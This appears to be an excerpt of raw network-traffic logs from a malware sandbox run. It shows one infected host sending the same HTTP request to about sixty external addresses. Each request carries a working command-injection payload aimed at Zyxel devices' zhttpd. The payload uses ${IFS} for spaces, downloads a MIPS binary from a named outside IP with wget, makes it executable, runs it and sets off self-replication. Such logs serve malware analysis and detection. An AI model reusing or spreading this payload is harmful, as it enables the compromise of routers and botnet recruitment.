                                    Jan 13, 2024 19:02:49.540563107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8321192.168.2.1344454130.80.183.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540580034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8322192.168.2.135980046.4.142.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540678978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8323192.168.2.135810873.200.167.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540740967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8324192.168.2.1345604128.67.65.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540802956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8325192.168.2.1342872203.76.205.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540852070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8326192.168.2.1346688163.251.215.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540906906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8327192.168.2.1358118176.50.156.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540992975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8328192.168.2.1359484221.142.188.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541058064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8329192.168.2.1343834114.64.31.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541088104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8330192.168.2.1359864204.116.163.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541148901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8331192.168.2.135577078.192.172.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541179895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8332192.168.2.135752486.150.79.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541234016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8333192.168.2.1337686217.225.9.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541315079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8334192.168.2.1360520105.95.190.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541322947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8335192.168.2.133431695.34.248.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541388035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8336192.168.2.1334854186.148.12.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541415930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8337192.168.2.133865434.210.64.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541485071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8338192.168.2.1337880189.235.29.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541532040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8339192.168.2.135614236.47.22.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541569948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8340192.168.2.1342638201.74.130.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541666031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8341192.168.2.1356882123.99.30.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541695118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8342192.168.2.134656496.194.15.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541769028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8343192.168.2.1345230211.229.74.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541800022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8344192.168.2.135315219.94.90.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541846991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8345192.168.2.134748682.89.153.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541889906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8346192.168.2.134259495.19.237.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.541944027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8347192.168.2.135945648.78.220.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542021990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8348192.168.2.135763064.193.75.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542084932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8349192.168.2.1347750169.130.179.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542176962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8350192.168.2.133798648.198.15.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542212009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8351192.168.2.134350012.92.155.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542299986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8352192.168.2.1344234167.128.55.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542335033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8353192.168.2.1351412108.139.109.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542382956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8354192.168.2.134071427.90.242.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542465925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8355192.168.2.135730298.100.88.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542495012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8356192.168.2.1348704222.242.216.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542550087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8357192.168.2.13412582.134.51.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542622089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8358192.168.2.135091283.69.251.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542685032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8359192.168.2.133999640.115.58.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542704105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8360192.168.2.1360400222.164.246.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542804003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8361192.168.2.135967637.141.185.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542843103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8362192.168.2.1348344220.97.245.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542887926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8363192.168.2.1354048111.212.129.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542932987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8364192.168.2.1348204154.133.103.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.542988062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8365192.168.2.136082014.77.82.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543073893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8366192.168.2.1340694157.83.120.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543148041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8367192.168.2.1355312179.242.202.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543185949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8368192.168.2.135184693.145.134.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543240070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8369192.168.2.135974824.107.2.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543292999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8370192.168.2.133331672.235.128.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543397903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8371192.168.2.134198483.212.103.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543438911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8372192.168.2.135341412.91.76.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543481112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8373192.168.2.135153649.226.32.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543550968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8374192.168.2.135931836.125.180.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543596029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8375192.168.2.1340938198.58.31.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543694973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8376192.168.2.135894866.39.237.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543741941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8377192.168.2.134464438.239.125.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543798923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8378192.168.2.1351998203.20.230.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543906927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8379192.168.2.13505825.127.116.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.543973923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8380192.168.2.1358744118.211.139.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544023991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8381192.168.2.133724691.186.6.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544096947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8382192.168.2.1358566106.118.148.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544179916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8383192.168.2.1355006180.55.103.47443
                                    TimestampBytes transferredDirectionData
